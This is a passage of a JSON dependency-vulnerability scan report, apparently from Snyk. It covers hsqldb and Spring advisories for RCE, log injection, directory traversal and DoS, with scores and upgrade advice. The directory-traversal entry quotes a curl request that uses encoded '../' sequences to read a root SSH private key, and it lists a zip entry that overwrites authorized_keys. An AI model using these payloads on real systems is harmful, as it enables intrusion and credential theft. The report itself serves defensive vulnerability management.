"3.1", - "modificationTime": "2024-03-11T09:53:59.414572Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. 
By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", - "epssDetails": { - "percentile": "0.85801", - "probability": "0.01274", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-41853" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-77xx-rxvh-q682" - ] - }, - "packageName": "org.hsqldb:hsqldb", - "proprietary": false, - "creationTime": "2022-10-07T07:26:42.276748Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-06T18:52:05Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hsqldb", - "artifactId": "hsqldb" - }, - "publicationTime": "2022-10-07T07:26:42.515068Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:59.414572Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - 
"io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hsqldb:hsqldb@2.3.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hsqldb:hsqldb", - "version": "2.3.2", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", - "title": "Improper Output Neutralization for Logs", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "Dennis Kennedy" - ], - "semver": { - "vulnerable": [ - "[5.3.0,5.3.12)", - "[,5.2.18)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.3.12", - "5.2.18" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 4.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5", - "title": "Github Commit" - }, - { - "url": "https://pivotal.io/security/cve-2021-22096", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:48:36.610042Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:53:48.086414Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:05:20.847607Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": 
"3.1", - "modificationTime": "2024-03-11T09:48:36.610042Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:48.086414Z" - } - ], - "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.3.12, 5.2.18 or higher.\n## References\n- [Github Commit](https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22096)\n", - "epssDetails": { - "percentile": "0.34533", - "probability": "0.00079", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-22096" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2022-01-02T11:14:46.053186Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-10-27T12:52:59Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2021-10-27T16:55:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:48.086414Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "psytester" - ], - "semver": { - "vulnerable": [ - "[,5.2.19.RELEASE)", - "[5.3.0,5.3.14)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.19.RELEASE", - "5.3.14" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 4.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://pivotal.io/security/cve-2021-22060", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:48:34.544783Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:49:10.667113Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:24.703024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.3, - 
"cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:34.544783Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:10.667113Z" - } - ], - "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Input Validation when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.2.19.RELEASE, 5.3.14 or higher.\n## References\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22060)\n", - "epssDetails": { - "percentile": "0.23203", - "probability": "0.00054", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-22060" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2022-01-06T12:31:26.181234Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-01-06T11:18:34Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2022-01-06T17:17:24.995166Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:10.667113Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - 
"org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", - "title": "Directory Traversal", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "credit": [ - "Takeshi Terada" - ], - "semver": { - "vulnerable": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "3.2.9.RELEASE", - "4.0.5.RELEASE" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ], - "functionId": { - "filePath": "org/springframework/util/StringUtils.java", - "className": "StringUtils", - "functionName": "cleanPath" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/16414", - "title": "GitHub Issue" - }, - { - "url": "https://jira.spring.io/browse/SPR-12354", - "title": "Jira Issue" - }, - { - "url": "http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html", - "title": "JVNDB" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578", - "title": "NVD" - }, - { - "url": "https://pivotal.io/security/cve-2014-3578", - "title": "Pivotal 
Security" - }, - { - "url": "http://www.pivotal.io/security/cve-2014-3578", - "title": "Pivotal Security" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1131882", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:07.314890Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:25.325641Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:46:07.314890Z" - } - ], - "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Directory Traversal. It allows remote attackers to read arbitrary files via a crafted URL.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. 
By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 
20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `org.springframework:spring-core` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16414)\n- [Jira Issue](https://jira.spring.io/browse/SPR-12354)\n- [JVNDB](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578)\n- [Pivotal Security](https://pivotal.io/security/cve-2014-3578)\n- [Pivotal Security](http://www.pivotal.io/security/cve-2014-3578)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1131882)\n", - "epssDetails": { - "percentile": "0.69801", - "probability": "0.00301", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2014-3578" - ], - "CWE": [ - "CWE-22" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:31.465000Z", - "functions_new": [ - { - "version": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ], - "functionId": { - "className": "org.springframework.util.StringUtils", - "functionName": "cleanPath" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2014-09-05T17:16:58Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2014-09-05T17:16:58Z", - "severityBasedOn": "CVSS", - "modificationTime": 
"2024-03-11T09:46:07.314890Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "4ra1n" - ], - "semver": { - "vulnerable": [ - "[,5.2.20.RELEASE)", - "[5.3.0,5.3.17)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.20.RELEASE", - "5.3.17" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using Spring Expression Language (SpEL)" - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/28145", - "title": "GitHub Issue" - }, - { - "url": "https://pivotal.io/security/cve-2022-22950", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:48:12.598178Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": 
"2024-03-11T09:53:47.044801Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:01.573408Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:12.598178Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.044801Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) by providing a specially crafted SpEL expression, that might result in an `OutOfMemoryError`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. 
For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.20.RELEASE, 5.3.17 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28145)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2022-22950)\n", - "epssDetails": { - "percentile": "0.35300", - "probability": "0.00081", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22950" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2022-03-29T10:05:31.971026Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-03-29T09:51:43Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": "2022-03-29T14:24:08Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.044801Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": 
"org.springframework:spring-expression", - "version": "3.2.6.RELEASE", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", - "title": "Allocation of Resources Without Limits or Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Google OSS-Fuzz team" - ], - "semver": { - "vulnerable": [ - "[,5.2.23.RELEASE)", - "[5.3.0,5.3.26)", - "[6.0.0,6.0.7)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.23.RELEASE", - "5.3.26", - "6.0.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5", - "title": "GitHub Commit" - }, - { - "url": "https://spring.io/security/cve-2023-20861", - "title": "Vulnerability Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:04.052825Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:54:00.291695Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": 
"2024-03-06T13:56:22.626014Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:04.052825Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:00.291695Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20861)\n", - "epssDetails": { - "percentile": "0.48906", - "probability": "0.00133", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-20861" - ], - "CWE": [ - "CWE-770" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2023-03-23T12:26:39.837900Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-03-23T11:49:46Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": 
"spring-expression" - }, - "publicationTime": "2023-03-23T12:37:13.052190Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.291695Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", - "title": "Allocation of Resources Without Limits or Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Google OSS-Fuzz Team" - ], - "semver": { - "vulnerable": [ - "[,5.2.24.RELEASE)", - "[5.3.0,5.3.27)", - "[6.0.0,6.0.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.24.RELEASE", - "5.3.27", - "6.0.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f", - "title": "GitHub Commit" - }, - { - "url": "https://spring.io/security/cve-2023-20863", - "title": "Vulnerability Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": 
